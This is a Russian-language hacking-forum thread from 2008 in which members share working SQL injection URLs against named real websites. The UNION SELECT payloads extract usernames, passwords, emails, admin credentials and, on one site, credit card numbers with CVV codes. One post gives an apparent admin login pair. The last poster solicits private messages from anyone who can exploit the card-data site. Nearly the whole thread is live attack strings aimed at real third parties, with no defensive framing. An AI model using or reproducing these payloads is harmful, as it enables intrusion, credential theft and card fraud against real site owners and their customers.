 |
|
09.07.2008, 06:21
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Academicjournals.net
http://www.academicjournals.net/2/archive.php?id=999999+union+select+1,2,3,4,5,6,7,8 ,9,10,11/*&theme=2&jid=ijv
жаль.. негмогу получить вывод (
http://www.academicjournals.net/2/archive.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+information_schema.tables/*&theme=2&jid=ijv
зато ясно что эт 4 версия. поетому и забил (
http://www.palmetto-records.net/artist.php?id=1'
тут поидее чтото странное.... union и select не опознаны)))
http://www.the213.net/php/article.php?id=99999+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20/*
хмм.. 20 перебрал и хз.......
http://www.torrentreactor.net/browse.php?id=3.inc.php)+union+select+1/*
не уверен что эт иньекция..
Lexeon
http://books.dovidka.com.ua/index.php?cat=999999999+union+select+password+from +test.users/*
вот правильная база..... но это сиравно тест.
database books
dir
1 : parent
2 : title
3 : image
4 : type
5 : author
6 : format
7 : pages
8 : palitura
9 : mova
10 : pereklad
11 : anot
12 : auditor
13 : image1
14 : sortir
15 : price
16 : pdf
17 : pdf1
18 : znyzhka
19 : sold
20 : weight
21 : xdate
22 : zamov1
23 : zamov2
order_cont
1 : item
2 : quan
3 : price
orders
1 : zamov
2 : tel
3 : addr
4 : xdate
5 : pindex
6 : organ
7 : pos
8 : email
9 : otrym
10 : opr
11 : zamov2
12 : zamov1
parms
1 : price_margin
2 : price_lower
3 : price_upper
4 : t1
5 : t2
6 : t3
7 : t4
8 : t5
9 : code1
10 : code2
11 : code3
database test
users
1 : password
Последний раз редактировалось sabe; 09.07.2008 в 06:53..
|
|
|
09.07.2008, 07:38
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
не работает потому что таблица находится в другой базе..
так определяем название базы и название таблицы...
http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( 0x2e,table_schema,table_name)+from+information_sch ema.tables+limit+20,1/*
ну а вот собственно и сам выбор из таблицы.. и заметь, что все работает и выводит
http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( 0x3a3a,username,password)+from+test.users/*
Последний раз редактировалось gisTy; 09.07.2008 в 08:02..
|
|
|
|
09.07.2008, 15:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
С нами:
9389186
Репутация:
573
|
|
ух что я нашел...
Код:
http://www.snipersister.de/wap/wapmain.php?option=onewsaction=linkid=-1+union+select+1,2,3,convert(aes_decrypt(aes_encrypt(concat(email,0x3a,username,0x3a,password),0x71),0x71),binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users--
вывод в цикле всегда радовало это  |
|
|
|
09.07.2008, 15:10
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
С нами:
9591697
Репутация:
96
|
|
в антибояне нет
www.u10.ru
Уязвимость в:
Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3')
Колонки:
http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*
Информация о базе:
Версия: 4.1.21-standard
Пользователь: u10_u10@localhost
|
|
|
|
09.07.2008, 15:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
С нами:
9389186
Репутация:
573
|
|
Сообщение от $p01nt
www.u10.ru
Уязвимость в:
Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3')
Колонки:
http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*
Информация о базе:
Версия: 4.1.21-standard
Пользователь: u10_u10@localhost
А че недокопать-то....
Код:
http://u10.ru/index.php?menu=category&id=-3+union+select+1,convert(concat_ws(0x3a,name,pass),binary)+from+admin--
|
|
|
|
09.07.2008, 15:21
|
|
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами:
11317286
Репутация:
3876
|
|
http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*
он весь дырявый.
Добро пожаловать в панель администрирования
сайтом http://u10.ru/
Сайт разработки бажный..
Последний раз редактировалось Rebz; 09.07.2008 в 15:26..
|
|
|
|
09.07.2008, 15:21
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами:
10885346
Репутация:
2947
|
|
Сообщение от $p01nt
www.u10.ru
Уязвимость в:
Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3')
Колонки:
http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*
Информация о базе:
Версия: 4.1.21-standard
Пользователь: u10_u10@localhost
_http://u10.ru/index.php?menu=category&id=-3+union+select+1,concat(name,char(58),pass)+from+a dmin+limit+0,1/*
http://u10.ru/admin/admin.php
|
|
|
|
09.07.2008, 15:31
|
|
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами:
11317286
Репутация:
3876
|
|
slider, ага.
rpanel.info - rpanel/pfobnf
|
|
|
|
09.07.2008, 16:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
С нами:
9389186
Репутация:
573
|
|
Ещё тема любви тут была... После нескольких нехитрых трюков с information_schema получаем:
http://www.lovetime.ru/search_form.php?rub_tablename=love_main+union+sele ct+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user _id,paswd321),0x71),0x71),4,5,6,7,8+from+love_inc--&raz_tablename=love_stihi
|
|
|
|
09.07.2008, 17:14
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Acte.org - PR 6
http://www.acte.org/resources/press_release.php?id=999999+union+select+1,2,3,con cat_ws(0x3a,login,password),5,6,7,8,9+from+users+l imit+0,1/*
получаем данные.. токо хз откуда они )
http://www.acte.org/resources/press_release.php?id=999999+union+select+1,2,3,con cat_ws(0x3a,username,password),5,6,7,8,9+from+com_ logins+limit+0,1/*
еще... пассы
http://www.acte.org/resources/press_release.php?id=999999+union+select+1,2,3,con cat_ws(0x3a,card_num,exp_date,cvv2,card_type,name, street,zip),5,6,7,8,9+from+invoice_cc+limit+0,1/*
ну и картон собственно )
кто сможет чтот с этим сайтом сделать пишите в личку )
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
